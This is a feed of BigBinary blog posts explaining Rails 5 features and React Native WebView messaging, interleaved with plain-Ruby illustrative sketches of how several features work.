       <content type="html"><![CDATA[<p>Rails 5 <a href="https://github.com/rails/rails/pull/18939">introduces Array Inquirer</a>, which wraps an array object and provides friendlier methods to check for the presence of elements that can be either strings or symbols.</p><pre><code class="language-ruby">pets = ActiveSupport::ArrayInquirer.new([:cat, :dog, 'rabbit'])
&gt; pets.cat?
#=&gt; true
&gt; pets.rabbit?
#=&gt; true
&gt; pets.elephant?
#=&gt; false</code></pre><p>Array Inquirer also has an <code>any?</code> method to check for the presence of any of the passed arguments as elements in the array.</p><pre><code class="language-ruby">pets = ActiveSupport::ArrayInquirer.new([:cat, :dog, 'rabbit'])
&gt; pets.any?(:cat, :dog)
#=&gt; true
&gt; pets.any?('cat', 'dog')
#=&gt; true
&gt; pets.any?(:rabbit, 'elephant')
#=&gt; true
&gt; pets.any?('elephant', :tiger)
#=&gt; false</code></pre><p>Since the <code>ArrayInquirer</code> class inherits from the <code>Array</code> class, its <code>any?</code> method performs the same as the <code>any?</code> method of the <code>Array</code> class when no arguments are passed.</p><pre><code class="language-ruby">pets = ActiveSupport::ArrayInquirer.new([:cat, :dog, 'rabbit'])
&gt; pets.any?
#=&gt; true
&gt; pets.any? { |pet| pet.to_s == 'dog' }
#=&gt; true</code></pre><h2>Use the inquiry method on an array to fetch its Array Inquirer version</h2><p>For any given array, we can get its Array Inquirer version by calling the <code>inquiry</code> method on it.</p><pre><code class="language-ruby">pets = [:cat, :dog, 'rabbit'].inquiry
&gt; pets.cat?
#=&gt; true
&gt; pets.rabbit?
#=&gt; true
&gt; pets.elephant?
#=&gt; false</code></pre><h2>Usage of Array Inquirer in Rails code</h2><p>Rails 5 <a href="https://github.com/georgeclaghorn/rails/blob/c64b99ecc98341d504aced72448bee758f3cfdaf/actionpack/lib/action_dispatch/http/mime_negotiation.rb#L89">makes use of Array Inquirer</a> to provide a better way of checking for the presence of a given variant.</p><p>Before Rails 5, the code looked like this.</p><pre><code class="language-ruby">request.variant = :phone
&gt; request.variant
#=&gt; [:phone]
&gt; request.variant.include?(:phone)
#=&gt; true
&gt; request.variant.include?('phone')
#=&gt; false</code></pre><p>The corresponding Rails 5 version is below.</p><pre><code class="language-ruby">request.variant = :phone
&gt; request.variant.phone?
#=&gt; true
&gt; request.variant.tablet?
#=&gt; false</code></pre>]]></content>
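A rough idea of how such predicate methods can be answered is a `method_missing` hook that treats `foo?` as a membership test, comparing strings and symbols interchangeably. `MiniArrayInquirer` below is an illustrative toy, not the ActiveSupport implementation.

```ruby
# Illustrative sketch: answer "#{element}?" by membership, matching
# strings and symbols interchangeably.
class MiniArrayInquirer < Array
  def any?(*candidates, &block)
    return super(&block) if candidates.empty? # plain Array#any?
    candidates.any? { |candidate| include_like?(candidate) }
  end

  private

  def respond_to_missing?(name, include_private = false)
    name.to_s.end_with?("?") || super
  end

  def method_missing(name, *args)
    return super unless name.to_s.end_with?("?")
    include_like?(name.to_s.chomp("?"))
  end

  # String/symbol agnostic membership check.
  def include_like?(candidate)
    any? { |element| element.to_s == candidate.to_s }
  end
end

pets = MiniArrayInquirer.new([:cat, :dog, "rabbit"])
puts pets.cat?                # => true
puts pets.elephant?           # => false
puts pets.any?("cat", :tiger) # => true
```

Overriding `respond_to_missing?` alongside `method_missing` keeps `respond_to?(:cat?)` truthful, which the real class also takes care of.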
    </entry><entry>
       <title><![CDATA[Rails 5 Renaming transactional fixtures to tests]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-renamed-transactional-fixtures-to-transactional-tests"/>
      <updated>2016-05-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-renamed-transactional-fixtures-to-transactional-tests</id>
       <content type="html"><![CDATA[<p>In Rails 4.x we have transactional fixtures that wrap each test in a database transaction. This transaction rolls back all the changes at the end of the test. It means the state of the database before the test is the same as after the test is done.</p><p>By default this functionality is enabled. We can choose to disable it in a test case class by setting the class attribute <code>use_transactional_fixtures</code> to <code>false</code>.</p><pre><code class="language-ruby">class FooTest &lt; ActiveSupport::TestCase
  self.use_transactional_fixtures = false
end</code></pre><p>Rails also comes with fixtures for tests. So it may seem that <code>use_transactional_fixtures</code> has something to do with the Rails fixtures. A lot of people don't use fixtures, and they think that they should disable <code>use_transactional_fixtures</code> because they do not use fixtures.</p><p>To overcome this confusion, Rails 5 has <a href="https://github.com/rails/rails/pull/19282">renamed transactional fixtures to transactional tests</a>, making it clear that the setting has nothing to do with the fixtures used in tests.</p><p>In Rails 5, the above example will be written as follows.</p><pre><code class="language-ruby">class FooTest &lt; ActiveSupport::TestCase
  self.use_transactional_tests = false
end</code></pre>]]></content>
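What a transactional test guarantees can be simulated in plain Ruby: run the test's writes, then roll back to a snapshot. `FakeDB` is an illustrative in-memory stand-in; Active Record achieves the same effect with real database transactions and a `ROLLBACK`.

```ruby
# Illustrative in-memory store: with_rollback mimics wrapping a test in a
# transaction that is rolled back afterwards.
class FakeDB
  def initialize
    @rows = []
  end

  def rows
    @rows.dup
  end

  def insert(row)
    @rows << row
  end

  # Run the block, then restore the snapshot, mimicking the ROLLBACK
  # issued at the end of each transactional test.
  def with_rollback
    snapshot = @rows.dup
    yield self
  ensure
    @rows = snapshot
  end
end

db = FakeDB.new
db.insert("existing user")
db.with_rollback { |d| d.insert("record created inside a test") }
puts db.rows.inspect # => ["existing user"]
```

The `ensure` clause restores the snapshot even if the block raises, just as a failing test still gets its transaction rolled back.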
    </entry><entry>
       <title><![CDATA[Data exchange between React Native app and WebView]]></title>
       <author><name>Bilal Budhani</name></author>
      <link href="https://www.bigbinary.com/blog/send-receive-data-between-react-native-and-webview"/>
      <updated>2016-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/send-receive-data-between-react-native-and-webview</id>
       <content type="html"><![CDATA[<p>A project we recently worked on needed some complicated charts. We built those charts using a JavaScript library, and they worked fine in browsers.</p><p>Then we needed to build a mobile app using <a href="https://facebook.github.io/react-native/">React Native</a>, and it would take a lot of time to build those charts natively. So we decided to use <code>WebView</code> to render the HTML pages which already display the charts nicely.</p><p>React Native comes with a <code>WebView</code> component by default, so rendering the HTML page using <code>WebView</code> was easy. However, once the page is rendered, the React Native app could not exchange any data with the web page.</p><p>In this blog post we'll discuss how to make a React Native app communicate with the pages rendered using <code>WebView</code> with the help of the <a href="https://github.com/alinz/react-native-webview-bridge">react-native-webview-bridge</a> library.</p><h2>What is React Native WebView Bridge?</h2><p><code>react-native-webview-bridge</code> is a wrapper on top of React Native's <code>WebView</code> component with some extra features.</p><p>First we need to install the <a href="https://github.com/alinz/react-native-webview-bridge">react-native-webview-bridge</a> package.</p><pre><code class="language-javascript">npm install react-native-webview-bridge --save</code></pre><p>Next we need to import the <code>WebView</code> bridge module.</p><pre><code class="language-javascript">// ES6
import WebViewBridge from &quot;react-native-webview-bridge&quot;;

// ES5
let WebViewBridge = require(&quot;react-native-webview-bridge&quot;);</code></pre><p>Now let's create a basic React component. This component will be responsible for rendering the HTML page using <code>WebView</code>.</p><pre><code class="language-javascript">React.createClass({
  render: function () {
    return (
      &lt;WebViewBridge
        ref=&quot;webviewbridge&quot;
        onBridgeMessage={this.onBridgeMessage.bind(this)}
        source={{ uri: &quot;https://www.example.com/charts&quot; }}
      /&gt;
    );
  },
});</code></pre><p>After the component is mounted, we will send data to the web view.</p><pre><code class="language-javascript">componentDidMount() {
  let chartData = { data: &quot;...&quot; };
  // Send this chart data over to the web view after 5 seconds.
  setTimeout(() =&gt; {
    this.refs.webviewbridge.sendToBridge(JSON.stringify(chartData));
  }, 5000);
},</code></pre><p>Next, we will add code to receive data from the web view.</p><pre><code class="language-javascript">onBridgeMessage: function (webViewData) {
  let jsonData = JSON.parse(webViewData);
  if (jsonData.success) {
    Alert.alert(jsonData.message);
  }
  console.log(&quot;data received&quot;, webViewData, jsonData);
  //.. do some React Native stuff when data is received
}</code></pre><p>At this point the code should look something like this.</p><pre><code class="language-javascript">React.createClass({
  componentDidMount() {
    let chartData = { data: &quot;...&quot; };
    // Send this chart data over to the web view after 5 seconds.
    setTimeout(() =&gt; {
      this.refs.webviewbridge.sendToBridge(JSON.stringify(chartData));
    }, 5000);
  },
  render: function () {
    return (
      &lt;WebViewBridge
        ref=&quot;webviewbridge&quot;
        onBridgeMessage={this.onBridgeMessage.bind(this)}
        source={{
          uri: &quot;https://www.example.com/charts&quot;,
        }}
      /&gt;
    );
  },
  onBridgeMessage: function (webViewData) {
    let jsonData = JSON.parse(webViewData);
    if (jsonData.success) {
      Alert.alert(jsonData.message);
    }
    console.log(&quot;data received&quot;, webViewData, jsonData);
    //.. do some React Native stuff when data is received
  },
});</code></pre><p>Okay, we've added all the React Native side of the code. We now need to add some JavaScript code on our web page to complete the functionality.</p><h2>Why do we need to add a JavaScript snippet on the web page?</h2><p>This is a two-way data exchange scenario. When our React Native app sends any data, this JavaScript snippet will parse that data and will trigger functions accordingly. We'll also be able to send some data back to the React Native app from JavaScript.</p><p>The <a href="https://github.com/alinz/react-native-webview-bridge#simple-example">example in the README</a> of the WebViewBridge library shows how to inject the JavaScript snippet from the React component. However, we prefer the JavaScript code to be added to the web page directly, since it provides more control and flexibility.</p><p>Coming back to our implementation, let's now add the snippet to our web page.</p><pre><code class="language-javascript">&lt;script&gt;
  (function () {
    if (WebViewBridge) {
      // This function gets triggered when data is received from the React Native app.
      WebViewBridge.onMessage = function (reactNativeData) {
        // Parses the JSON payload.
        var jsonData = JSON.parse(reactNativeData);
        // Passes data to charts for rendering.
        renderChart(jsonData.data);
        // Data to send from the web view to the React Native app.
        var dataToSend = JSON.stringify({ success: true, message: 'Data received' });
        // Keep calm and send the data.
        WebViewBridge.send(dataToSend);
      };
    }
  }())
&lt;/script&gt;</code></pre><p>Done! We've achieved our goal of having a two-way communication channel between our React Native app and the web page.</p><p>Check out <a href="https://github.com/alinz/react-native-webview-bridge/tree/master/examples/SampleRN20">this link</a> for more examples of how to use WebView Bridge.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds ignored_columns for Active Record]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-active-record-ignored-columns"/>
      <updated>2016-05-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-active-record-ignored-columns</id>
       <content type="html"><![CDATA[<p>Sometimes we need to ignore a database column. However, Rails 4.x doesn't have any officially defined method which hides a database column from Active Record. We can apply our own patch on the model to ignore certain columns.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  # Ignoring employee_email column
  def self.columns
    super.reject { |column| column.name == 'employee_email' }
  end
end</code></pre><h3>Rails 5 added ignored_columns</h3><p>Rails 5 <a href="https://github.com/rails/rails/pull/21720">has added ignored_columns</a> to the <code>ActiveRecord::Base</code> class.</p><p>Here is the revised code using <code>ignored_columns</code>.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  self.ignored_columns = %w(employee_email)
end</code></pre>]]></content>
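The `self.columns` patch can be exercised outside Rails. The sketch below uses a plain `BaseModel` class with hypothetical column names to show how the override filters what the parent class reports, which is essentially the trick the Rails 4.x workaround relies on.

```ruby
# Stand-in for a model's column source; the column names are hypothetical.
class BaseModel
  def self.columns
    %w(id name employee_email)
  end
end

class User < BaseModel
  IGNORED_COLUMNS = %w(employee_email).freeze

  # Reject the ignored columns from whatever the parent reports, just
  # like the self.columns override on an Active Record model.
  def self.columns
    super.reject { |column| IGNORED_COLUMNS.include?(column) }
  end
end

puts User.columns.inspect # => ["id", "name"]
```

Rails 5's `ignored_columns` declaration achieves the same result without having to override `columns` by hand.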
    </entry><entry>
       <title><![CDATA[Rails 5 adds a hidden field on collection radio buttons]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-add-a-hidden-field-on-collection-radio-buttons"/>
      <updated>2016-05-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-add-a-hidden-field-on-collection-radio-buttons</id>
       <content type="html"><![CDATA[<p>Consider the following form, which has only one input, <code>role_id</code>, accepted through <code>collection_radio_buttons</code>.</p><pre><code class="language-ruby">&lt;%= form_for(@user) do |f| %&gt;
  &lt;%= f.collection_radio_buttons :role_id, @roles, :id, :name %&gt;
  &lt;div class=&quot;actions&quot;&gt;
    &lt;%= f.submit %&gt;
  &lt;/div&gt;
&lt;% end %&gt;</code></pre><p>In the controller, we can access <code>role_id</code> using strong parameters.</p><pre><code class="language-ruby">def user_params
  params.require(:user).permit(:role_id)
end</code></pre><p>When we try to submit this form without selecting any radio button in Rails 4.x, we get a <code>400 Bad Request</code> error with the following message.</p><pre><code class="language-ruby">ActionController::ParameterMissing (param is missing or the value is empty: user)</code></pre><p>This is because the following parameters were sent to the server in Rails 4.x.</p><pre><code class="language-ruby">Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;authenticity_token&quot;=&gt;&quot;...&quot;, &quot;commit&quot;=&gt;&quot;Create User&quot;}</code></pre><p>According to the HTML specification, when multiple parameters are passed to <code>collection_radio_buttons</code> and no option is selected, web browsers do not send any value to the server.</p><h2>Solution in Rails 5</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/18303">adds a hidden field on collection_radio_buttons</a> to avoid raising an error when the only input on the form is <code>collection_radio_buttons</code>. The hidden field has the same name as the collection radio buttons and a blank value.</p><p>The following parameters will be sent to the server in Rails 5 when the above user form is submitted:</p><pre><code class="language-ruby">Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;authenticity_token&quot;=&gt;&quot;...&quot;, &quot;user&quot;=&gt;{&quot;role_id&quot;=&gt;&quot;&quot;}, &quot;commit&quot;=&gt;&quot;Create User&quot;}</code></pre><p>In case we don't want the helper to generate this hidden field, we can specify <code>include_hidden: false</code>.</p><pre><code class="language-ruby">&lt;%= f.collection_radio_buttons :role_id, Role.all, :id, :name, include_hidden: false %&gt;</code></pre>]]></content>
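Why the hidden field prevents the error can be sketched in plain Ruby: a `require`-style lookup raises when the key is absent, and the hidden input guarantees the `user` key is always present even when no radio button is selected. `Params` below is an illustrative stand-in for strong parameters, not the Action Controller class.

```ruby
# Illustrative stand-in for params.require: raise when the key is missing.
class Params
  def initialize(hash)
    @hash = hash
  end

  def require(key)
    @hash.fetch(key) { raise KeyError, "param is missing: #{key}" }
  end
end

# Rails 4.x shape: no "user" key at all when nothing is selected.
without_hidden = Params.new({ "commit" => "Create User" })
# Rails 5 shape: the hidden field always submits a blank role_id.
with_hidden = Params.new({ "user" => { "role_id" => "" }, "commit" => "Create User" })

puts with_hidden.require("user").inspect # => {"role_id"=>""}
begin
  without_hidden.require("user")
rescue KeyError => e
  puts e.message # the missing key is what surfaces as ParameterMissing
end
```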
    </entry><entry>
       <title><![CDATA[Rails 5 Attributes from Active Record to Active Model]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-moved-assign-attributes-from-activerecord-to-activemodel"/>
      <updated>2016-05-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-moved-assign-attributes-from-activerecord-to-activemodel</id>
       <content type="html"><![CDATA[<p>Before Rails 5, we could use the <code>assign_attributes</code> method for bulk assignment of attributes only on objects whose classes inherited from the <code>ActiveRecord::Base</code> class.</p><p>In Rails 5, we can make use of the <code>assign_attributes</code> method for bulk assignment of attributes even on objects whose classes do not inherit from <code>ActiveRecord::Base</code>.</p><p>This is possible because the attribute assignment code <a href="https://github.com/rails/rails/pull/10776">has now moved</a> from the <code>ActiveRecord::AttributeAssignment</code> module to the <code>ActiveModel::AttributeAssignment</code> module.</p><p>To have this up and running, we need to include the <code>ActiveModel::AttributeAssignment</code> module in our class.</p><pre><code class="language-ruby">class User
  include ActiveModel::AttributeAssignment

  attr_accessor :email, :first_name, :last_name
end

user = User.new
user.assign_attributes({email:      'sam@example.com',
                        first_name: 'Sam',
                        last_name:  'Smith'})

&gt; user.email
#=&gt; &quot;sam@example.com&quot;
&gt; user.first_name
#=&gt; &quot;Sam&quot;</code></pre>]]></content>
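The behaviour the module provides can be approximated in a few lines of plain Ruby: iterate over a Hash and call the matching writer for each key. `MiniAttributeAssignment` below is an illustrative sketch, not the ActiveModel implementation (which, for instance, raises `ActiveModel::UnknownAttributeError` rather than a plain `ArgumentError`).

```ruby
# Illustrative sketch of bulk attribute assignment via writer methods.
module MiniAttributeAssignment
  def assign_attributes(attributes)
    attributes.each do |name, value|
      setter = "#{name}="
      unless respond_to?(setter)
        raise ArgumentError, "unknown attribute: #{name}"
      end
      public_send(setter, value) # delegate to the attr writer
    end
  end
end

class User
  include MiniAttributeAssignment

  attr_accessor :email, :first_name, :last_name
end

user = User.new
user.assign_attributes(email: "sam@example.com", first_name: "Sam")
puts user.email      # => "sam@example.com"
puts user.first_name # => "Sam"
```

Using `public_send` rather than `send` means only public writers are reachable, which is the safe default for mass assignment.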
    </entry><entry>
       <title><![CDATA[Rails 5 Configure Active Job backend adapter for jobs]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-to-inherit-activejob-queue-adapter"/>
      <updated>2016-05-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-to-inherit-activejob-queue-adapter</id>
       <content type="html"><![CDATA[<p>Before Rails 5 we had the ability to configure the Active Job <code>queue_adapter</code> only at the application level. If we wanted to use <code>sidekiq</code> as our backend queue adapter, we would configure it as follows.</p><pre><code class="language-ruby">config.active_job.queue_adapter = :sidekiq</code></pre><p>This <code>queue_adapter</code> would be applicable to all jobs.</p><p>Rails 5 provides the ability to configure <code>queue_adapter</code> <a href="https://github.com/rails/rails/pull/16992">on a per-job basis</a>. It means the <code>queue_adapter</code> for one job can be different from that of another job.</p><p>Let's suppose we have two jobs in our brand new Rails 5 application. <code>EmailJob</code> is responsible for processing basic emails and <code>NewsletterJob</code> sends out newsletters.</p><pre><code class="language-ruby">class EmailJob &lt; ActiveJob::Base
  self.queue_adapter = :sidekiq
end

class NewsletterJob &lt; ActiveJob::Base
end

EmailJob.queue_adapter
 =&gt; #&lt;ActiveJob::QueueAdapters::SidekiqAdapter:0x007fb3d0b2e4a0&gt;
NewsletterJob.queue_adapter
 =&gt; #&lt;ActiveJob::QueueAdapters::AsyncAdapter:0x007fb3d0c61b88&gt;</code></pre><p>We are now able to configure the <code>sidekiq</code> queue adapter for <code>EmailJob</code>. In the case of <code>NewsletterJob</code> we fall back to the global default adapter, which in the case of a new Rails 5 app <a href="rails-5-changed-default-active-job-adapter-to-async">is async</a>.</p><p>Moreover, in Rails 5, when one job inherits from another job, the queue adapter of the parent job is inherited by the child job, unless the child job is configured to change the queue adapter.</p><p>Since newsletters are email jobs, we can make <code>NewsletterJob</code> inherit from <code>EmailJob</code>.</p><p>Below is an example where <code>EmailJob</code> is using <code>resque</code> while <code>NewsletterJob</code> is using <code>sidekiq</code>.</p><pre><code class="language-ruby">class EmailJob &lt; ActiveJob::Base
  self.queue_adapter = :resque
end

class NewsletterJob &lt; EmailJob
end

EmailJob.queue_adapter
 =&gt; #&lt;ActiveJob::QueueAdapters::ResqueAdapter:0x007fe137ede2a0&gt;
NewsletterJob.queue_adapter
 =&gt; #&lt;ActiveJob::QueueAdapters::ResqueAdapter:0x007fe137ede2a0&gt;

class NewsletterJob &lt; EmailJob
  self.queue_adapter = :sidekiq
end

NewsletterJob.queue_adapter
 =&gt; #&lt;ActiveJob::QueueAdapters::SidekiqAdapter:0x007fb3d0b2e4a0&gt;</code></pre>]]></content>
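The per-job, inheritable lookup can be sketched with class-level state in plain Ruby: a reader walks up the ancestor chain until it finds a class that set its own adapter, falling back to a global default. `BaseJob` and the `:async` default below are illustrative stand-ins for Active Job, not its actual implementation.

```ruby
# Illustrative sketch of an inheritable per-class setting.
class BaseJob
  DEFAULT_ADAPTER = :async

  def self.queue_adapter=(name)
    @queue_adapter = name # stored on the class object itself
  end

  # Use this class's own value if set, otherwise ask the superclass,
  # bottoming out at the global default.
  def self.queue_adapter
    return @queue_adapter if instance_variable_defined?(:@queue_adapter)
    if superclass.respond_to?(:queue_adapter)
      superclass.queue_adapter
    else
      DEFAULT_ADAPTER
    end
  end
end

class EmailJob < BaseJob
  self.queue_adapter = :resque
end

class NewsletterJob < EmailJob; end

puts EmailJob.queue_adapter      # => :resque
puts NewsletterJob.queue_adapter # => :resque (inherited from EmailJob)
puts BaseJob.queue_adapter       # => :async  (global default)
```

Because class-level instance variables are not shared down the hierarchy, the walk up `superclass` is what produces the "child inherits the parent's adapter unless it sets its own" behaviour.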
    </entry><entry>
       <title><![CDATA[Rails 5 accepts 1 or true for acceptance validation]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-accepts-1-or-true-for-acceptance-validation"/>
      <updated>2016-05-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-accepts-1-or-true-for-acceptance-validation</id>
       <content type="html"><![CDATA[<p><code>validates_acceptance_of</code> is a good validation tool for asking users to accept &quot;terms of service&quot; or similar items.</p><p>Before Rails 5, the only acceptable value for a <code>validates_acceptance_of</code> validation was <code>1</code>.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  validates_acceptance_of :terms_of_service
end

&gt; user = User.new(terms_of_service: &quot;1&quot;)
&gt; user.valid?
#=&gt; true</code></pre><p>Having an acceptable value of <code>1</code> does cause some ambiguity, because the general purpose of acceptance validation is for attributes that hold boolean values.</p><p>So in order to have <code>true</code> as the acceptance value, we had to pass the <code>accept</code> option to <code>validates_acceptance_of</code> as shown below.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  validates_acceptance_of :terms_of_service, accept: true
end

&gt; user = User.new(terms_of_service: true)
&gt; user.valid?
#=&gt; true
&gt; user.terms_of_service = '1'
&gt; user.valid?
#=&gt; false</code></pre><p>But this comes with the cost that <code>1</code> is no longer an acceptable value.</p><p>In Rails 5, we have <code>true</code> as a <a href="https://github.com/rails/rails/pull/18439">default value for acceptance</a> along with the already existing acceptable value of <code>1</code>.</p><p>In Rails 5 the previous example would look as shown below.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  validates_acceptance_of :terms_of_service
end

&gt; user = User.new(terms_of_service: true)
&gt; user.valid?
#=&gt; true
&gt; user.terms_of_service = '1'
&gt; user.valid?
#=&gt; true</code></pre><h2>Rails 5 allows users to have a custom set of acceptable values</h2><p>In Rails 5, the <code>:accept</code> option of the <code>validates_acceptance_of</code> method supports an array of values, unlike the single value that we had before.</p><p>So in our example, if we are to validate our <code>terms_of_service</code> attribute with any of <code>true</code>, <code>&quot;y&quot;</code>, or <code>&quot;yes&quot;</code>, we could write our validation as follows.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  validates_acceptance_of :terms_of_service, accept: [true, &quot;y&quot;, &quot;yes&quot;]
end

&gt; user = User.new(terms_of_service: true)
&gt; user.valid?
#=&gt; true
&gt; user.terms_of_service = 'y'
&gt; user.valid?
#=&gt; true
&gt; user.terms_of_service = 'yes'
&gt; user.valid?
#=&gt; true</code></pre>]]></content>
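Validating against a set of accepted values boils down to a membership check, which can be sketched in plain Ruby. `User` below is an illustrative plain class, not an Active Record model, and `ACCEPTED` plays the role of the `:accept` array.

```ruby
# Illustrative sketch: acceptance validation as a membership check
# against a configurable set of accepted values.
class User
  ACCEPTED = [true, "1", "y", "yes"].freeze

  attr_accessor :terms_of_service

  def initialize(terms_of_service: nil)
    @terms_of_service = terms_of_service
  end

  # Valid when the attribute holds any of the accepted values.
  def valid?
    ACCEPTED.include?(terms_of_service)
  end
end

puts User.new(terms_of_service: "yes").valid? # => true
puts User.new(terms_of_service: true).valid?  # => true
puts User.new(terms_of_service: "no").valid?  # => false
```

Allowing an array is what lets `true`, `"1"`, and friendlier strings like `"yes"` all pass the same validation.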
    </entry><entry>
       <title><![CDATA[Rails 5 supports bi-directional destroy dependency]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/Rails-5-supports-bi-directional-destroy-dependency"/>
      <updated>2016-05-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/Rails-5-supports-bi-directional-destroy-dependency</id>
       <content type="html"><![CDATA[<p>In Rails 4.x, it is not possible to have a destroy dependency on both sides of a bi-directional association between two models, as it would result in an infinite callback loop causing <code>SystemStackError: stack level too deep</code>.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  has_one :profile, dependent: :destroy
end

class Profile &lt; ActiveRecord::Base
  belongs_to :user, dependent: :destroy
end</code></pre><p>Calling <code>User#destroy</code> or <code>Profile#destroy</code> would lead to an infinite callback loop.</p><pre><code class="language-ruby">&gt;&gt; user = User.first
=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;
&gt;&gt; user.profile
=&gt; &lt;Profile id: 4&gt;
&gt;&gt; user.destroy
=&gt; DELETE FROM `profiles` WHERE `profiles`.`id` = 4
   ROLLBACK
SystemStackError: stack level too deep</code></pre><p>Rails 5 <a href="https://github.com/rails/rails/pull/18548">supports bi-directional destroy dependency</a> without triggering an infinite callback loop.</p><pre><code class="language-ruby">&gt;&gt; user = User.first
=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;
&gt;&gt; user.profile
=&gt; &lt;Profile id: 4, about: 'Rails developer', works_at: 'ABC'&gt;
&gt;&gt; user.destroy
=&gt; DELETE FROM &quot;profiles&quot; WHERE &quot;profiles&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 4]]
   DELETE FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 4]]
=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;</code></pre><p>There are many instances like the above where we need to destroy an associated record when a record is itself being destroyed; otherwise we may be left with orphan records.</p><p>This feature places responsibility on developers to add a destroy dependency only when it is required, as it can have unintended consequences, as shown below.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  has_many :posts, dependent: :destroy
end

class Post &lt; ApplicationRecord
  belongs_to :user, dependent: :destroy
end

&gt;&gt; user = User.first
=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;
&gt;&gt; user.posts
=&gt; &lt;ActiveRecord::Associations::CollectionProxy [#&lt;Post id: 11, title: 'Ruby', user_id: 4&gt;, #&lt;Post id: 12, title: 'Rails', user_id: 4&gt;]&gt;</code></pre><p>As we can see, the &quot;user&quot; has two posts. Now we will destroy the first post.</p><pre><code class="language-ruby">&gt;&gt; user.posts.first.destroy
=&gt; DELETE FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 11]]
   SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;user_id&quot; = ?  [[&quot;user_id&quot;, 4]]
   DELETE FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 12]]
   DELETE FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 4]]</code></pre><p>We wanted to remove only the post with id &quot;11&quot;. However, the post with id &quot;12&quot; also got deleted. Not only that, but the user record got deleted too. This is because destroying the post triggered the destroy dependency on its user, which in turn destroyed all of the user's posts.</p><p>In Rails 4.x this would have resulted in <code>SystemStackError: stack level too deep</code>.</p><p>So we should use this option very carefully.</p>]]></content>
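One way such a cycle can be broken is to mark a record as destroyed before cascading and to skip records that are already being destroyed. The classes below are plain-Ruby stand-ins sketching that idea, not the actual Active Record mechanism.

```ruby
# Illustrative sketch: a destroyed? guard breaks the A -> B -> A cycle
# that a bi-directional dependent: :destroy would otherwise create.
class Record
  attr_accessor :other # the associated record on the far side

  def destroyed?
    @destroyed == true
  end

  def destroy
    return if destroyed?   # guard: already in the middle of destruction
    @destroyed = true      # mark first, then cascade
    other.destroy if other # fire the dependent destroy
  end
end

user    = Record.new
profile = Record.new
user.other = profile
profile.other = user # bi-directional dependency

user.destroy
puts user.destroyed?    # => true
puts profile.destroyed? # => true, with no SystemStackError
```

Without the guard, `user.destroy` would call `profile.destroy`, which would call `user.destroy` again, recursing until the stack overflows.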
    </entry><entry>
       <title><![CDATA[Rails 5 adds after_commit callbacks aliases]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-after_create-aliases"/>
      <updated>2016-05-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-after_create-aliases</id>
       <content type="html"><![CDATA[<p>Rails 4.x has the <a href="http://guides.rubyonrails.org/active_record_callbacks.html">after_commit</a> callback. <code>after_commit</code> is called after a record has been created, updated, or destroyed.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base
  after_commit :send_welcome_mail, on: :create
  after_commit :send_profile_update_notification, on: :update
  after_commit :remove_profile_data, on: :destroy

  def send_welcome_mail
    EmailSender.send_welcome_mail(email: email)
  end
end</code></pre><h2>Rails 5 added new aliases</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/22516">has added</a> the following three aliases.</p><ul><li>after_create_commit</li><li>after_update_commit</li><li>after_destroy_commit</li></ul><p>Here is the revised code using these aliases.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  after_create_commit :send_welcome_mail
  after_update_commit :send_profile_update_notification
  after_destroy_commit :remove_profile_data

  def send_welcome_mail
    EmailSender.send_welcome_mail(email: email)
  end
end</code></pre><h3>Note</h3><p>We earlier stated that the <code>after_commit</code> callback is executed at the end of a transaction. Using <code>after_commit</code> with a transaction block can be tricky. Please check out our earlier post about the <a href="gotcha-with-after_commit-callback-in-rails">Gotcha with after_commit callback in Rails</a>.</p>]]></content>
